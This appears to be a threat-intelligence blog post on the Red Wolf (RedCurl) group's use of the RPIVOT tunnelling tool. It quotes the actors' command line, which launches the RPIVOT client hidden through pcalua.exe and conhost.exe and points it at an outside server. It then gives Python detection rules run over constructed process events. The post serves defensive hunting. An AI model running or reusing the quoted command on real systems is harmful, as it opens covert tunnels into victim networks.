011. Red Wolf Toolset Update

Hello everyone! Adversary toolsets are always evolving, and today we'll look at another example of it.

Recently Huntress published a report on Red Wolf (also known as RedCurl and Earth Kapre) attacks against several organizations in Canada. The report includes information on a tool we hadn't previously observed this activity cluster use: RPIVOT, a Python tool for SOCKS tunneling. Its client side (cl.py) runs on the victim host and connects back to an adversary-controlled server, which then exposes a SOCKS proxy into the victim network.

To execute the tool, the adversary used the following command:

pcalua.exe -a conhost.exe -c --headless C:\ProgramData\ControlsUp\python.exe C:\ProgramData\ControlsUp\cl\cl.py --s 188.130.207[.]253 --p 10310

As you can see, we have lots of detection and hunting opportunities:

  • The threat actors abused pcalua.exe (the Program Compatibility Assistant launcher) with the -a parameter to proxy execution of conhost.exe.
  • They also leveraged conhost.exe with the -c and --headless parameters to hide the child process window. The resulting process tree (pcalua.exe spawning conhost.exe spawning python.exe) is itself a hunting artefact.
  • The adversary used python.exe to execute a script from a suspicious folder (C:\ProgramData\ControlsUp), which makes both the interpreter location and the script path good hunting candidates.
  • Finally, RPIVOT has lots of command line parameters that can be used to build detections: --s, --server-ip, --p, --server-port, and others.
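
To show how the four opportunities above stack up against real telemetry, here is an added example (mine, not Huntress's or the actors' code) that runs simple rules over constructed Sysmon Event ID 1-style process-creation records. Only the first command line is taken from the report; the parent/child images, the benign look-alike events, and the list of "suspicious" script directories are assumptions for illustration.

```python
"""Detection logic for the proxied RPIVOT execution chain discussed above.

Added example: not Huntress's or Red Wolf's code. Events are constructed
Sysmon Event ID 1-style records (Image, ParentImage, CommandLine); only the
first command line is taken from the report.
"""
import re

# Constructed process-creation events. Events 0-2 are the chain the reported
# command line produces (pcalua -> conhost -> python); 3 and 4 are benign
# look-alikes that the rules must not flag.
EVENTS = [
    {
        "Image": r"C:\Windows\System32\pcalua.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"pcalua.exe -a conhost.exe -c --headless C:\ProgramData\ControlsUp\python.exe C:\ProgramData\ControlsUp\cl\cl.py --s 188.130.207[.]253 --p 10310",
    },
    {
        "Image": r"C:\Windows\System32\conhost.exe",
        "ParentImage": r"C:\Windows\System32\pcalua.exe",
        "CommandLine": r"conhost.exe -c --headless C:\ProgramData\ControlsUp\python.exe C:\ProgramData\ControlsUp\cl\cl.py --s 188.130.207[.]253 --p 10310",
    },
    {
        "Image": r"C:\ProgramData\ControlsUp\python.exe",
        "ParentImage": r"C:\Windows\System32\conhost.exe",
        "CommandLine": r"C:\ProgramData\ControlsUp\python.exe C:\ProgramData\ControlsUp\cl\cl.py --s 188.130.207[.]253 --p 10310",
    },
    {   # ordinary console host spawned for a cmd.exe window (benign)
        "Image": r"C:\Windows\System32\conhost.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"\??\C:\Windows\system32\conhost.exe 0x4",
    },
    {   # developer running a script from their own profile (benign)
        "Image": r"C:\Users\alice\AppData\Local\Programs\Python\Python311\python.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"python.exe C:\Users\alice\dev\report.py --config C:\Users\alice\dev\report.ini",
    },
]


def _image_is(event, name):
    """True when the process image file name is exactly `name` (case-insensitive)."""
    return event["Image"].lower().endswith("\\" + name)


def pcalua_proxy_exec(event):
    """pcalua.exe -a <target>: the Program Compatibility Assistant launches <target>."""
    return _image_is(event, "pcalua.exe") and re.search(r"(?i)\s-a\s+\S", event["CommandLine"]) is not None


def conhost_headless(event):
    """conhost.exe --headless <target>: the child runs without a visible console window."""
    return _image_is(event, "conhost.exe") and "--headless" in event["CommandLine"].lower()


# Assumed list of directories where an interpreter running a script is unusual enough to hunt on.
SUSPICIOUS_DIRS = ("\\programdata\\", "\\users\\public\\", "\\windows\\temp\\")


def python_script_from_suspicious_dir(event):
    """python.exe executing a .py file located under one of SUSPICIOUS_DIRS."""
    if not re.search(r"(?i)\\python(?:3|w)?\.exe$", event["Image"]):
        return False
    match = re.search(r"(?i)(\S+\.py)\b", event["CommandLine"])
    return bool(match) and any(d in match.group(1).lower() for d in SUSPICIOUS_DIRS)


def rpivot_client_args(event):
    """Short and long forms of the RPIVOT client options named in the post."""
    cmd = event["CommandLine"]
    has_server = re.search(r"(?i)(?:--s|--server-ip)\s+\S+", cmd)
    has_port = re.search(r"(?i)(?:--p|--server-port)\s+\d+", cmd)
    return bool(has_server and has_port)


RULES = [pcalua_proxy_exec, conhost_headless, python_script_from_suspicious_dir, rpivot_client_args]


def evaluate(events):
    """Return one hit per event that matches at least one rule, listing the rule names."""
    hits = []
    for index, event in enumerate(events):
        fired = [rule.__name__ for rule in RULES if rule(event)]
        if fired:
            hits.append({"index": index, "image": event["Image"], "rules": fired})
    return hits


if __name__ == "__main__":
    for hit in evaluate(EVENTS):
        print(f"event {hit['index']}: {hit['image']} -> {', '.join(hit['rules'])}")
```

Each of the three events in the chain trips two rules, while the benign conhost and developer events trip none. The argument-based rule (rpivot_client_args) is the noisiest on its own, since the option names are generic; in practice it earns its keep when scored together with the proxy-execution and script-location signals rather than alerting alone.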

Threat actors often update their toolsets to bypass your security controls, so make sure you test your detections often enough!

See you tomorrow!
